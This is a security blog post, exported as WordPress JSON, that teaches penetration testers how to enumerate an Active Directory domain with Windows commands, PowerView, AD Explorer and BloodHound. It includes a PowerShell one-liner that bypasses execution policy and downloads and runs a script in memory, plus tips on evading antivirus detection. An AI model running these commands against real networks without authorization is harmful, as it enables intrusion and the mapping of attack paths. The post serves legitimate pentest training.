{"id":2182,"date":"2024-09-25T12:17:38","date_gmt":"2024-09-25T12:17:38","guid":{"rendered":"https:\/\/xdr-mdr.lmntrix.com\/main_web\/?p=2182"},"modified":"2025-07-29T03:25:19","modified_gmt":"2025-07-29T03:25:19","slug":"active-directory-penetration-dojo-ad-environment-enumeration","status":"publish","type":"post","link":"https:\/\/lmntrix.com\/blog\/active-directory-penetration-dojo-ad-environment-enumeration\/","title":{"rendered":"Active Directory Penetration Dojo \u2013 AD Environment Enumeration"},"content":{"rendered":"\n
\"\"\/<\/figure>\n\n\n\n

Hi everyone, we\u2019ve discussed basics of Active Directory and different servers in AD in previous blog posts of this series. If you\u2019ve not yet read that, please find that here in [Part 1]<\/a> and [Part 2]<\/a>. We\u2019ve also understood trust relationships in AD environment. You can read post on trust relationships [here]<\/a>.<\/p>\n\n\n\n

Let\u2019s have a look at the current post in which we\u2019ll discuss how to enumerate an active directory domain and map various entities, trusts, relationships and privileges in it.<\/p>\n\n\n\n

Few things to understand:<\/strong><\/h2>\n\n\n\n

LDAP<\/strong> is used by Active directory as its access protocol. So when you enumerate information from AD, your query is sent to it as an LDAP query.<\/p>\n\n\n\n

– AD relies on DNS<\/strong> as its locator service<\/strong> that enables the clients to locate domain controllers and other hosts in the domain through DNS queries.<\/p>\n\n\n\n

– AD Database is NTDS.DIT<\/strong><\/p>\n\n\n\n

– AD supports several Naming conventions like:<\/p>\n\n\n\n

– User Principal name:<\/p>\n\n\n\n

– winsaafman@scriptdotsh.local<\/p>\n\n\n\n

– DN (Distinguished Names) LDAP names:<\/p>\n\n\n\n

– CN = Common name<\/p>\n\n\n\n

– OU = Organisational Unit<\/p>\n\n\n\n

– DC = Domain<\/p>\n\n\n

\n
\"\"<\/figure>\n<\/div>\n\n\n

– Any standard domain user can enumerate active directory information. There is no need for administrative rights to do that.<\/p>\n\n\n\n

– We\u2019ll be using powershell a lot in the enumeration stage. In powershell, you get warning on running the scripts because of the execution policy setting policy. Execution Policy is just a way to stop users from accidentally executing scripts. It’s not really a security control, because it has builtin bypass parameters. (powershell -ExecutionPolicy bypass<\/strong>) as you can see in screenshot below:<\/p>\n\n\n

\n
\"\"<\/figure>\n<\/div>\n\n\n

If you don\u2019t want to save powershell module on disk and just load directly into memory and run some of its command, you can try it like this.<\/p>\n\n\n\n

powershell.exe -exec Bypass -C \u201cIEX (New-Object Net.WebClient).DownloadString(\u2018http:\/\/raw.githubusercontent.com\/PowerShellMafia\/PowerSploit\/master\/Recon\/PowerView.ps1\u2019);Get-NetDomain\u201d<\/p>\n\n\n\n

In addition to the -exec Bypass<\/strong>, there are several other ways to evade powershell blocking which is already there on the internet. So we won\u2019t be talking much about that.<\/p>\n\n\n\n

We can use the ADSI, .NET classes, DSquery, Powershell frameworks, CMD, WMI, AD Module etc. for enumerating active directory. In current blogpost, we\u2019ll enumerate the domain using the Active Directory powershell module and powerview.<\/p>\n\n\n\n

In the discovery phase, we aim to analyse a lot of things about the client environment and locate their PII, network architecture, devices, critical business applications etc. Then finding threats to those critical assets and looking for misconfigurations, vulnerabilities and weaknesses.<\/p>\n\n\n\n

Local Recon<\/strong><\/h3>\n\n\n\n

Those of you who are very new to windows command line, here are few commands that you could use to do local enumeration.<\/p>\n\n\n\n

\u2013 To display the IP, subnet, default gateway etc<\/p>\n\n\n\n

ipconfig \/all<\/pre>\n\n\n\n
\u2013 To display current user name, info in current access token, SID, privs and group that current user belongs to<\/p>\n\n\n\n
whoami \/all<\/pre>\n\n\n\n
\u2013 To show local groups on current machine:<\/p>\n\n\n\n
net localgroup<\/pre>\n\n\n\n
\u2013 To show local administrators of current machine:<\/p>\n\n\n\n
net localgroup \u201cadministrators\u201d<\/pre>\n\n\n\n
\u2013 To check active tcp connections, ports, which the computer is listening, ethernet statistics, ip routing table<\/p>\n\n\n\n
netstat -an<\/pre>\n\n\n\n
\u2013 To display running processes with verbose mode:<\/p>\n\n\n\n
tasklist \/V<\/p>\n\n\n\n
\u2013 Shows the windows started services:<\/p>\n\n\n\n
net start<\/pre>\n\n\n\n
\u2013 Shows the windows services with binary paths:<\/p>\n\n\n\n
sc qc <service name><\/pre>\n\n\n\n
\u2013 Show OS, processor, memory, bios related info:<\/p>\n\n\n\n
systeminfo > output.txt<\/pre>\n\n\n\n
\u2013 To check for scheduled tasks:<\/p>\n\n\n\n
schtasks \/query \/fo LIST \/v<\/pre>\n\n\n\n
\u2013 To check for the patches installed and figuring out if its missing important any patch:<\/p>\n\n\n\n
wmic qfe get Caption,Description,HotFixID,InstalledOn<\/pre>\n\n\n\n
There are a lot more commands and tips\/tricks which you can see in this post<\/a> by @ParanoidNinja<\/a>.<\/p>\n\n\n\n
But current post is more focused on Active Directory domain enumeration.<\/p>\n\n\n\n
Basic CMD commands for domain and network recon<\/strong><\/h3>\n\n\n\n
\u2013 Shows mapping of IP address to its MAC address in the network:<\/p>\n\n\n\n
 arp -a<\/pre>\n\n\n\n
\u2013 Shows the domain:<\/p>\n\n\n\n
 echo %USERDOMAIN%<\/pre>\n\n\n\n
\u2013 Prints the domain controller name:<\/p>\n\n\n\n
 echo %logonserver%<\/pre>\n\n\n\n
\u2013 Prints a list of domain users<\/p>\n\n\n\n
  net user \/domain<\/pre>\n\n\n\n
\u2013 Prints a list of groups in the domain:<\/p>\n\n\n\n
net group \/domain<\/pre>\n\n\n\n
\u2013 Prints the AD domain password policy:<\/p>\n\n\n\n
net accounts \/domain<\/pre>\n\n\n\n
\u2013 Maps AD trust relationships:<\/p>\n\n\n\n
nltest \/domain_trusts<\/pre>\n\n\n\n
Now, let\u2019s have a look at enumerating through Active Directory Module for windows.<\/p>\n\n\n\n
Enumeration using Active Directory powershell module:<\/strong><\/h2>\n\n\n\n
Active Directory module is used to query Active Directory without getting help of any external powershell modules or scripts. (Also used for administration) Moreover, it is signed by Microsoft, so there are less chances of detection and getting flagged as malicious by AVs when you use AD Module and not some external powershell scripts for AD enumeration.<\/p>\n\n\n\n
By default, this module needs Admin privileges and Remote Server Administration Toolkit to be installed on the client machine where you want to enable AD powershell module. Every domain controller has ADDS and RSAT installed. So basically, those servers have built-in Active Directory module installed. But there is other way to use it without installing RSAT. Let\u2019s see how we use that module.<\/p>\n\n\n\n
We don\u2019t actually need to install Remote Server Administration toolkit. Its just that we need to copy the Microsoft.ActiveDirectory.Management.dll file from a DC or a server having RSAT installed and copy it to our client machine and import into powershell. Or you can download it from here<\/a>.<\/p>\n\n\n\n
This is the location of the file on a DC:<\/u><\/strong><\/h3>\n\n\n\n
C:\\Windows\\Microsoft.NET\\assembly\\GAC_64\\Microsoft.ActiveDirectory.Management\\<\/p>\n\n\n
\n
\"\"<\/figure>\n<\/div>\n\n\n
Import it into powershell:<\/u><\/strong><\/h3>\n\n\n
\n
\"\"<\/figure>\n<\/div>\n\n\n
Once it is imported, then we can enumerate the AD environment using AD module commands.<\/p>\n\n\n\n
One more benefit is that it works in PowerShell Constrained Language Mode<\/a> as well.<\/p>\n\n\n
\n
\"\"<\/figure>\n<\/div>\n\n\n
As you can see, in PCL mode, it is working fine.<\/p>\n\n\n\n
\u2013 Prints info about AD Users:<\/u><\/strong><\/h3>\n\n\n\n
Get-ADUser -Filter * | select Name,SID,Enabled<\/p>\n\n\n
\n
\"\"<\/figure>\n<\/div>\n\n\n
Or you can try filters to get data on demand like the below example which is for fetching admin groups.<\/p>\n\n\n\n
\u2013 Shows all admin groups in the domain:<\/u><\/strong><\/h3>\n\n\n\n
Get-ADGroup -Filter {Name -like “admin”} | select name, GroupScope<\/p>\n\n\n
\n
\"\"<\/figure>\n<\/div>\n\n\n
\u2013 To get information about your current AD Domain:<\/u><\/strong><\/h3>\n\n\n\n
Get-ADDomain<\/p>\n\n\n\n
\u2013 Prints info about AD Forest:<\/u><\/strong><\/h3>\n\n\n\n
Get-ADForest<\/p>\n\n\n\n
\"\"<\/figure>\n\n\n\n
\u2013 Prints info about mapping AD Trust:<\/u><\/strong><\/h3>\n\n\n\n
Get-ADTrust -Filter *<\/p>\n\n\n
\n
\"\"<\/figure>\n<\/div>\n\n\n
There are other commands too which you find in PowerShell Gallery for Active Directory Module.<\/p>\n\n\n\n
Enumeration using Powerview:<\/strong><\/h3>\n\n\n\n
PowerView Reference<\/a><\/p>\n\n\n\n
Downloaded PowerView from above link and dot-sourced it.<\/p>\n\n\n
\n
\"\"<\/figure>\n<\/div>\n\n\n
Now we can use its commands.<\/p>\n\n\n\n
\u2013 To get list of all domain computers\/servers:<\/u><\/strong><\/h3>\n\n\n\n
Get-NetComputer<\/p>\n\n\n
\n
\"\"<\/figure>\n<\/div>\n\n\n
\u2013 Prints info about the domain controllers in current domain<\/u><\/strong>:<\/h3>\n\n\n\n
Get-NetDomainController<\/p>\n\n\n
\n
\"\"<\/figure>\n<\/div>\n\n\n
\u2013 Prints info about the groups in current domain:<\/u><\/strong><\/h3>\n\n\n\n
Get-NetGroup<\/p>\n\n\n\n
We can also get group details for domain controller from DC of other domain which has trust relationship with this domain:<\/p>\n\n\n\n
\"\"<\/figure>\n\n\n\n
\u2013 Prints info about the active sessions on a specified server:<\/u><\/strong><\/h3>\n\n\n\n
Get-NetSession<\/p>\n\n\n
\n
\"\"<\/figure>\n<\/div>\n\n\n
Now, let check the ACLs (Access control list). ACLs contain access control entries (ACE).<\/p>\n\n\n\n
Each ACE in an ACL identifies a trustee and specifies the access rights allowed, denied, or audited for that trustee:<\/p>\n\n\n\n
\u2013 Prints ACL information for specified ActiveDirectory object.<\/u><\/strong><\/h3>\n\n\n\n
Get-ObjectAcl<\/pre>\n\n\n
\n
\"\"<\/figure>\n<\/div>\n\n\n
You can also check if the current user context has local administrator access to a specified host in the domain:<\/p>\n\n\n\n
Find-LocalAdminAccess -Verbose<\/pre>\n\n\n
\n
\"\"<\/figure>\n<\/div>\n\n\n
We can see above that we got a system where this has local admin access.<\/p>\n\n\n\n
\u2013 To enumerate members of the local Administrators groups<\/strong> across all machines in the domain, you can do the following:<\/p>\n\n\n\n
Invoke-EnumerateLocalAdmin -Verbose<\/pre>\n\n\n\n
Creating Active Directory Snapshot for offline analysis:<\/strong><\/h3>\n\n\n\n
We have a great tool AD Explorer<\/strong> (from Microsoft Sysinternals) which is really useful for AD pentesters. You just need a domain account and explore AD objects like you are on domain controller. You could find the same structure of Active Directory objects in same way that is in schema.<\/p>\n\n\n\n
Reference<\/strong>– AD Explorer<\/a><\/p>\n\n\n\n
You can download it from here<\/a>. Also, if you don\u2019t have access to browser, just directly type this UNC path \\\\live.sysinternals.com\\tools<\/strong> in URL bar of Windows explorer and execute it without downloading and the file will be loaded.<\/p>\n\n\n
\n
\"\"<\/figure>\n<\/div>\n\n\n
Execute it and you\u2019ll get below window to connect to AD.<\/p>\n\n\n
\n
\"\"<\/figure>\n<\/div>\n\n\n
Assuming that you are logged in with domain user, it will connect you when you press OK. Otherwise you need to enter credentials.<\/p>\n\n\n
\n
\"\"<\/figure>\n<\/div>\n\n\n
You can see the AD data and look for interesting attributes. One cool feature of AD explorer is that it allows you to create snapshot. Let\u2019s create one.<\/p>\n\n\n
\n
\"\"<\/figure>\n<\/div>\n\n\n
Click \u201cCreate Snapshot\u201d and give it any name.<\/p>\n\n\n
\n
\"\"<\/figure>\n<\/div>\n\n\n
Make sure you keep low throttle value so that it doesn\u2019t cause heavy load on server.<\/p>\n\n\n\n
Within few seconds, you\u2019ll have the snapshot of AD and you can take it with you and analyse it offline.<\/p>\n\n\n\n
Recon Active Directory using Bloodhound<\/strong><\/h2>\n\n\n\n
We have another great tool Bloodhound<\/strong>.<\/p>\n\n\n\n
Reference<\/strong> – Bloodhound<\/strong><\/a><\/p>\n\n\n\n
It shows the hidden relationships within an Active Directory environment using graph theory.<\/p>\n\n\n\n
Really helpful to do analysis on graph and identify highly complex attack paths.<\/p>\n\n\n\n